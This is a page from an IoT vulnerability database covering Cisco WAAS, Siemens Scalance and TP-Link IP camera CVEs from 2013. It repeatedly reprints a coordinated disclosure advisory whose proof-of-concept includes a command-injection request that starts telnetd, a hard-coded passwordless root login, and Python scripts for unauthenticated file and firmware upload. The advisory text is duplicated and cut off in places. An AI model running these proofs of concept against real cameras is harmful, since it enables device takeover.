VARIoT IoT vulnerabilities database
| VAR-201308-0090 | CVE-2013-3443 | Cisco WAAS Software of Web Vulnerability to execute arbitrary code in service framework |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The web service framework in Cisco WAAS Software 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1 in a Central Manager (CM) configuration allows remote attackers to execute arbitrary code via a crafted POST request, aka Bug ID CSCuh26626. Vendors have confirmed this vulnerability Bug ID CSCuh26626 It is released as.Skillfully crafted by a third party POST Arbitrary code may be executed via a request. Cisco Wide Area Application Services is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue is being tracked by Cisco bug ID CSCuh26626. This software is mainly used in the link environment with small bandwidth and large delay. Cisco WAAS Software 4.x, Cisco WAAS Software 5.x prior to 5.0.3e, Cisco WAAS Software 5.1.x prior to 5.1.1c, Cisco WAAS Software 5.2.x prior to 5.2.1 are affected
| VAR-201308-0091 | CVE-2013-3444 | plural Cisco Product Web Framework arbitrary command execution vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The web framework in Cisco WAAS Software before 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1; Cisco ACNS Software 4.x and 5.x before 5.5.29.2; Cisco ECDS Software 2.x before 2.5.6; Cisco CDS-IS Software 2.x before 2.6.3.b50 and 3.1.x before 3.1.2b54; Cisco VDS-IS Software 3.2.x before 3.2.1.b9; Cisco VDS-SB Software 1.x before 1.1.0-b96; Cisco VDS-OE Software 1.x before 1.0.1; and Cisco VDS-OS Software 1.x in central-management mode allows remote authenticated users to execute arbitrary commands by appending crafted strings to values in GUI fields, aka Bug IDs CSCug40609, CSCug48855, CSCug48921, CSCug48872, CSCuh21103, CSCuh21020, and CSCug56790. plural Cisco Product Web Framework central management mode (central-management mode) Contains a vulnerability that allows arbitrary command execution. Vendors have confirmed this vulnerability Bug ID CSCug40609 , CSCug48855 , CSCug48921 , CSCug48872 , CSCuh21103 , CSCuh21020 ,and CSCug56790 It is released as.By a remotely authenticated user GUI An arbitrary command may be executed by adding a specially crafted string to the field value. Multiple Cisco Content Network and Video Delivery products are prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
Successfully exploiting this issue may allow an unprivileged attacker to execute arbitrary commands on the affected system and completely compromise the affected devices.
This issue is being tracked by Cisco bug IDs CSCug40609, CSCug48855, CSCug48921, CSCug48872, CSCuh21103, CSCuh21020, and CSCug56790. Cisco Wide Area Application Services (WAAS) is a set of WAN link acceleration software from Cisco. This software is mainly used in the link environment with small bandwidth and large delay
| VAR-201308-0352 | CVE-2013-4652 | Siemens Scalance W-700 Series Authentication Bypass Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the command-line management interface on Siemens Scalance W7xx devices with firmware before 4.5.4 allows remote attackers to bypass authentication and execute arbitrary code via a (1) SSH or (2) TELNET connection. The Siemens Scalance W-700 Series is an industrial wireless switch device developed by Siemens. Devices supporting IEEE 802.11a/b/g with firmware version < v4.5.4 below are affected by this vulnerability: SCALANCE W744-1, W746-1, W747-1 SCALANCE W744-1PRO, W746-1PRO, W747-1RR SCALANCE W784- 1, W784-1RR SCALANCE W786-1PRO, W786-2PRO, W786-3PRO, W786-2RR SCALANCE W788-1PRO, W788-2PRO, W788-1RR, W788-2RR.
Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and completely compromise an affected system.
Siemens Scalance W-700 Series running firmware versions prior to 4.5.4 are vulnerable
| VAR-201307-0210 | CVE-2013-3425 | Cisco WebEx of Meeting Center Component enumerated file vulnerability |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The Meeting Center component in Cisco WebEx 11 generates different error messages for invalid file-access attempts depending on whether a file exists, which allows remote authenticated users to enumerate files via a series of SPI calls, aka Bug ID CSCuc35965. WebEx is prone to a remote security vulnerability. Cisco WebEx is a set of Web conferencing tools developed by American Cisco (Cisco), which can assist office workers in different places to coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM). There is a security vulnerability in the Meeting Center component of Cisco WebEx version 11.0. Attackers can use these error messages through a series of SPI Call enumeration file
| VAR-201308-0351 | CVE-2013-4651 | Siemens SCALANCE W700 In the series firmware SSL Vulnerability to perform man-in-the-middle attacks on sessions |
CVSS V2: 6.6 CVSS V3: - Severity: MEDIUM |
Siemens Scalance W7xx devices with firmware before 4.5.4 use the same hardcoded X.509 certificate across different customers' installations, which makes it easier for remote attackers to conduct man-in-the-middle attacks against SSL sessions by leveraging the certificate's trust relationship. The Siemens Scalance W-700 Series is an industrial wireless switch device developed by Siemens. Devices supporting IEEE 802.11a/b/g with firmware version < v4.5.4 below are affected by this vulnerability: SCALANCE W744-1, W746-1, W747-1 SCALANCE W744-1PRO, W746-1PRO, W747-1RR SCALANCE W784- 1, W784-1RR SCALANCE W786-1PRO, W786-2PRO, W786-3PRO, W786-2RR SCALANCE W788-1PRO, W788-2PRO, W788-1RR, W788-2RR.
Attackers can exploit this issue to spoof a valid server and conduct man-in-the-middle attacks. Successful exploits will cause victims to accept the certificates assuming they are from a legitimate site.
Siemens Scalance W-700 series running firmware versions prior to 4.5.4 are vulnerable
| VAR-201310-0194 | CVE-2013-2578 | plural TP-Link IP Cameras Product cgi-bin/admin/servetest Vulnerable to arbitrary command execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
cgi-bin/admin/servetest in TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6 allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the ServerName parameter and (2) other unspecified parameters. The TP-Link TL-SC3171 IP camera is a webcam device. TP-Link TL-SC3171 IP Cameras are prone to multiple remote command-injection vulnerabilities.
Attackers may exploit these issues to execute arbitrary commands with root privileges in the context of the affected device.
TP-Link TL-SC3171 running firmware version LM.1.6.18P12_sign5 is vulnerable; other versions may also be affected. There is a command injection vulnerability in the cgi-bin/admin/servetest file in versions earlier than LM.1.6.18P12_sign6 of TP-LINK IP Cameras. The following models are affected: TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G. *Advisory Information*
Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
Advisory ID: CORE-2013-0618
Advisory URL:
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
Date published: 2013-07-30
Date of last update: 2013-07-30
Vendors contacted: TP-Link
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Use of hard-coded credentials
[CWE-798], Authentication Bypass Issues [CWE-592], Missing
Authentication for Critical Function [CWE-306]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581
3. [CVE-2013-2578] to execute arbitrary commands through the file
'/cgi-bin/admin/servetest'.
2. [CVE-2013-2579] to execute arbitrary commands in a shell using
hard-coded credentials.
3. [CVE-2013-2580] to perform unauthenticated remote file uploads.
5. [CVE-2013-2581] to perform unauthenticated remote firmware upgrades.
3.1. *Attack Paths*
There are several attack paths that can be exploited by combining these
vulnerabilities with other ones discovered by Eliezer Varade Lopez,
Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack
paths are available, but the ones listed here allow understanding how an
attacker could compromise the affected device.
3.1.1. *Attack Path I*
(Authentication: none)
1. Upload a rooted firmware exploiting [CVE-2013-2581].
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3.1.2. *Attack Path II*
(Authentication: bypassed)
1. Reset the device to its factory defaults exploiting
'http://<ip-cam>/cgi-bin/hardfactorydefault'[2]. After this step, the
authentication can by bypassed by using 'admin:admin' as a valid
'username:password'.
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3. Start the Telnet service exploiting [CVE-2013-2578].
4. Login to the Telnet service using user 'qmik' (no password)
[CVE-2013-2579], and use the device as a pivoting point.
4. *Vulnerable Packages*
Tests and PoC were run on:
.
5. *Vendor Information, Solutions and Workarounds*
Vendor provides the links to (pre-release) patched firmware versions
[3]. The final official versions will be released in the next few days.
Please, contact TP-Link for further information.
6. *Credits*
These vulnerabilities were discovered by Flavio de Cristofaro and
researched with the help of Andres Blanco from Core Security
Technologies. The publication of this advisory was coordinated by
Fernando Miranda from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection in servetest*
[CVE-2013-2578] The file '/cgi-bin/admin/servetest' has an OS command
injection in several of its parameters that can be exploited by an
authenticated user to execute arbitrary commands. The following proof of
concept starts the telnetd service:
/-----
GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2
-----/
7.2. *Hard-coded credentials in telnet service*
[CVE-2013-2579] The affected system includes a hard-coded login with no
password which could be used by a remote attacker to access the OS of
the affected device using the built-in telnet service:
/-----
username: qmik
password: (none)
-----/
The 'qmik' user is allowed to execute the command 'su', allowing the
user to execute arbitrary commands with root level privileges. The
telnet service can be enabled through [CVE-2013-2578].
7.3. *Unauthenticated remote file uploads*
[CVE-2013-2580] The file '/cgi-bin/uploadfile' allows an unauthenticated
user to perform remote file uploads as shown in the following Python PoC:
/-----
import requests
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("http://192.168.1.100/cgi-bin/uploadfile",
files={fileName: open(fileName, "rb")})
-----/
The uploaded file (in this example lala.tmp) will be hosted in the
'/mnt/mtd' directory.
7.4. *Unauthenticated remote firmware upgrades*
[CVE-2013-2581] The file '/cgi-bin/firmwareupgrade' allows an
unauthenticated user to perform remote firmware upgrades as shown in the
following Python POC:
/-----
import requests
requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset",
files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)
-----/
8. *Report Timeline*
. 2013-06-12:
Core Security Technologies notifies the TP-Link team of the vulnerability. 2013-06-18:
Core Security Technologies notifies the TP-Link team of the
vulnerability and set the estimated publication date of the advisory for
July 10, 2013. 2013-06-19:
TP-Link answers saying that these vulnerabilities are the same as the
ones published on May 28, 2013. 2013-06-26:
Core Security Technologies notifies the TP-Link team that these are new,
different, vulnerabilities and sends a draft report with technical
information. 2013-06-26:
Vendor acknowledges the receipt of the technical report. 2013-07-01:
Vendor requests additional technical information. 2013-07-04:
Core re-sends an improved technical report with additional information
regarding possible attack paths [Sec. 3.1]. 2013-07-10:
First release date missed. 2013-07-15:
Core asks for a status update. 2013-07-22:
Vendor notifies that a patched firmware version will be released on July
29th. 2013-07-22:
Core re-schedules the advisory publication for July 29th. 2013-07-26:
Vendor notifies that a (pre-release) patched firmware version is
available [3] and being tested. 2013-07-30:
Advisory CORE-2013-0618 is published.
9. *References*
[1] TP-Link TL-SC3171,
http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.
[3] See the online version,
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201310-0195 | CVE-2013-2579 | TP-Link TL-SC3171 IP Camera Remote Command Injection Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6 have an empty password for the hardcoded "qmik" account, which allows remote attackers to obtain administrative access via a TELNET session. The TP-Link TL-SC3171 IP camera is a webcam device.
TP-Link TL-SC3171 running firmware version LM.1.6.18P12_sign5 is vulnerable; other versions may also be affected. The vulnerability comes from the fact that the program sets the hard-coded 'qmik' account with an empty password. A remote attacker can exploit this vulnerability through a TELNET session to gain administrator privileges. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
1. *Advisory Information*
Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
Advisory ID: CORE-2013-0618
Advisory URL:
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
Date published: 2013-07-30
Date of last update: 2013-07-30
Vendors contacted: TP-Link
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Use of hard-coded credentials
[CWE-798], Authentication Bypass Issues [CWE-592], Missing
Authentication for Critical Function [CWE-306]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581
3. *Vulnerability Description*
Multiple vulnerabilities have been found in TP-Link TL-SC3171 [1] IP
camera running firmware version LM.1.6.18P12_sign5 that could allow an
attacker:
1. [CVE-2013-2578] to execute arbitrary commands through the file
'/cgi-bin/admin/servetest'.
2. [CVE-2013-2579] to execute arbitrary commands in a shell using
hard-coded credentials.
3. [CVE-2013-2580] to perform unauthenticated remote file uploads.
5. [CVE-2013-2581] to perform unauthenticated remote firmware upgrades.
3.1. *Attack Paths*
There are several attack paths that can be exploited by combining these
vulnerabilities with other ones discovered by Eliezer Varade Lopez,
Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack
paths are available, but the ones listed here allow understanding how an
attacker could compromise the affected device.
3.1.1. *Attack Path I*
(Authentication: none)
1. Upload a rooted firmware exploiting [CVE-2013-2581].
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3.1.2. *Attack Path II*
(Authentication: bypassed)
1. Reset the device to its factory defaults exploiting
'http://<ip-cam>/cgi-bin/hardfactorydefault'[2]. After this step, the
authentication can by bypassed by using 'admin:admin' as a valid
'username:password'.
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3. Start the Telnet service exploiting [CVE-2013-2578].
4. Login to the Telnet service using user 'qmik' (no password)
[CVE-2013-2579], and use the device as a pivoting point.
4. *Vulnerable Packages*
Tests and PoC were run on:
.
5. *Vendor Information, Solutions and Workarounds*
Vendor provides the links to (pre-release) patched firmware versions
[3]. The final official versions will be released in the next few days.
Please, contact TP-Link for further information.
6. *Credits*
These vulnerabilities were discovered by Flavio de Cristofaro and
researched with the help of Andres Blanco from Core Security
Technologies. The publication of this advisory was coordinated by
Fernando Miranda from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection in servetest*
[CVE-2013-2578] The file '/cgi-bin/admin/servetest' has an OS command
injection in several of its parameters that can be exploited by an
authenticated user to execute arbitrary commands. The following proof of
concept starts the telnetd service:
/-----
GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2
-----/
7.2. The
telnet service can be enabled through [CVE-2013-2578].
7.3. *Unauthenticated remote file uploads*
[CVE-2013-2580] The file '/cgi-bin/uploadfile' allows an unauthenticated
user to perform remote file uploads as shown in the following Python PoC:
/-----
import requests
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("http://192.168.1.100/cgi-bin/uploadfile",
files={fileName: open(fileName, "rb")})
-----/
The uploaded file (in this example lala.tmp) will be hosted in the
'/mnt/mtd' directory.
7.4. *Unauthenticated remote firmware upgrades*
[CVE-2013-2581] The file '/cgi-bin/firmwareupgrade' allows an
unauthenticated user to perform remote firmware upgrades as shown in the
following Python POC:
/-----
import requests
requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset",
files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)
-----/
8. *Report Timeline*
. 2013-06-12:
Core Security Technologies notifies the TP-Link team of the vulnerability. 2013-06-18:
Core Security Technologies notifies the TP-Link team of the
vulnerability and set the estimated publication date of the advisory for
July 10, 2013. 2013-06-19:
TP-Link answers saying that these vulnerabilities are the same as the
ones published on May 28, 2013. 2013-06-26:
Core Security Technologies notifies the TP-Link team that these are new,
different, vulnerabilities and sends a draft report with technical
information. 2013-06-26:
Vendor acknowledges the receipt of the technical report. 2013-07-01:
Vendor requests additional technical information. 2013-07-04:
Core re-sends an improved technical report with additional information
regarding possible attack paths [Sec. 3.1]. 2013-07-10:
First release date missed. 2013-07-15:
Core asks for a status update. 2013-07-22:
Vendor notifies that a patched firmware version will be released on July
29th. 2013-07-22:
Core re-schedules the advisory publication for July 29th. 2013-07-26:
Vendor notifies that a (pre-release) patched firmware version is
available [3] and being tested. 2013-07-30:
Advisory CORE-2013-0618 is published.
9. *References*
[1] TP-Link TL-SC3171,
http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.
[2] Security Analysis of IP video surveillance cameras,
http://seclists.org/fulldisclosure/2013/Jun/84.
[3] See the online version,
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201310-0196 | CVE-2013-2580 | plural TP-Link IP Cameras Vulnerability in uploading arbitrary files in the product |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Unrestricted file upload vulnerability in cgi-bin/uploadfile in TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6, allows remote attackers to upload arbitrary files, then accessing it via a direct request to the file in the mnt/mtd directory. The TP-Link TL-SC3171 IP camera is a webcam device. The issue occurs because the application fails to adequately sanitize user-supplied input.
TP-Link TL-SC3171 IP Camera running firmware LM.1.6.18P12_sign5 is vulnerable; other versions may also be affected. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
1. *Advisory Information*
Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
Advisory ID: CORE-2013-0618
Advisory URL:
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
Date published: 2013-07-30
Date of last update: 2013-07-30
Vendors contacted: TP-Link
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Use of hard-coded credentials
[CWE-798], Authentication Bypass Issues [CWE-592], Missing
Authentication for Critical Function [CWE-306]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581
3.
2. [CVE-2013-2579] to execute arbitrary commands in a shell using
hard-coded credentials.
3. [CVE-2013-2580] to perform unauthenticated remote file uploads.
5. [CVE-2013-2581] to perform unauthenticated remote firmware upgrades.
3.1. *Attack Paths*
There are several attack paths that can be exploited by combining these
vulnerabilities with other ones discovered by Eliezer Varade Lopez,
Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack
paths are available, but the ones listed here allow understanding how an
attacker could compromise the affected device.
3.1.1. *Attack Path I*
(Authentication: none)
1. Upload a rooted firmware exploiting [CVE-2013-2581].
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3.1.2. *Attack Path II*
(Authentication: bypassed)
1. Reset the device to its factory defaults exploiting
'http://<ip-cam>/cgi-bin/hardfactorydefault'[2]. After this step, the
authentication can by bypassed by using 'admin:admin' as a valid
'username:password'.
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3. Start the Telnet service exploiting [CVE-2013-2578].
4. Login to the Telnet service using user 'qmik' (no password)
[CVE-2013-2579], and use the device as a pivoting point.
4. *Vulnerable Packages*
Tests and PoC were run on:
.
5. *Vendor Information, Solutions and Workarounds*
Vendor provides the links to (pre-release) patched firmware versions
[3]. The final official versions will be released in the next few days.
Please, contact TP-Link for further information.
6. *Credits*
These vulnerabilities were discovered by Flavio de Cristofaro and
researched with the help of Andres Blanco from Core Security
Technologies. The publication of this advisory was coordinated by
Fernando Miranda from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection in servetest*
[CVE-2013-2578] The file '/cgi-bin/admin/servetest' has an OS command
injection in several of its parameters that can be exploited by an
authenticated user to execute arbitrary commands. The following proof of
concept starts the telnetd service:
/-----
GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2
-----/
7.2. *Hard-coded credentials in telnet service*
[CVE-2013-2579] The affected system includes a hard-coded login with no
password which could be used by a remote attacker to access the OS of
the affected device using the built-in telnet service:
/-----
username: qmik
password: (none)
-----/
The 'qmik' user is allowed to execute the command 'su', allowing the
user to execute arbitrary commands with root level privileges. The
telnet service can be enabled through [CVE-2013-2578].
7.3. *Unauthenticated remote file uploads*
[CVE-2013-2580] The file '/cgi-bin/uploadfile' allows an unauthenticated
user to perform remote file uploads as shown in the following Python PoC:
/-----
import requests
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("http://192.168.1.100/cgi-bin/uploadfile",
files={fileName: open(fileName, "rb")})
-----/
The uploaded file (in this example lala.tmp) will be hosted in the
'/mnt/mtd' directory.
7.4. *Unauthenticated remote firmware upgrades*
[CVE-2013-2581] The file '/cgi-bin/firmwareupgrade' allows an
unauthenticated user to perform remote firmware upgrades as shown in the
following Python POC:
/-----
import requests
requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset",
files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)
-----/
8. *Report Timeline*
. 2013-06-12:
Core Security Technologies notifies the TP-Link team of the vulnerability. 2013-06-18:
Core Security Technologies notifies the TP-Link team of the
vulnerability and set the estimated publication date of the advisory for
July 10, 2013. 2013-06-19:
TP-Link answers saying that these vulnerabilities are the same as the
ones published on May 28, 2013. 2013-06-26:
Core Security Technologies notifies the TP-Link team that these are new,
different, vulnerabilities and sends a draft report with technical
information. 2013-06-26:
Vendor acknowledges the receipt of the technical report. 2013-07-01:
Vendor requests additional technical information. 2013-07-04:
Core re-sends an improved technical report with additional information
regarding possible attack paths [Sec. 3.1]. 2013-07-10:
First release date missed. 2013-07-15:
Core asks for a status update. 2013-07-22:
Vendor notifies that a patched firmware version will be released on July
29th. 2013-07-22:
Core re-schedules the advisory publication for July 29th. 2013-07-26:
Vendor notifies that a (pre-release) patched firmware version is
available [3] and being tested. The final firmware version will be
released in the next few days. 2013-07-30:
Advisory CORE-2013-0618 is published.
9. *References*
[1] TP-Link TL-SC3171,
http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.
[2] Security Analysis of IP video surveillance cameras,
http://seclists.org/fulldisclosure/2013/Jun/84.
[3] See the online version,
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201310-0197 | CVE-2013-2581 | TP-Link TL-SC3171 IP Camera Remote Security Bypass Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
cgi-bin/firmwareupgrade in TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6 allows remote attackers to modify the firmware revision via a "preset" action. The TP-Link TL-SC3171 IP camera is a webcam device. The vulnerability is caused by the device not properly restricting access to the firmware update function. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
1. *Advisory Information*
Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
Advisory ID: CORE-2013-0618
Advisory URL:
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
Date published: 2013-07-30
Date of last update: 2013-07-30
Vendors contacted: TP-Link
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Use of hard-coded credentials
[CWE-798], Authentication Bypass Issues [CWE-592], Missing
Authentication for Critical Function [CWE-306]
Impact: Code execution, Security bypass
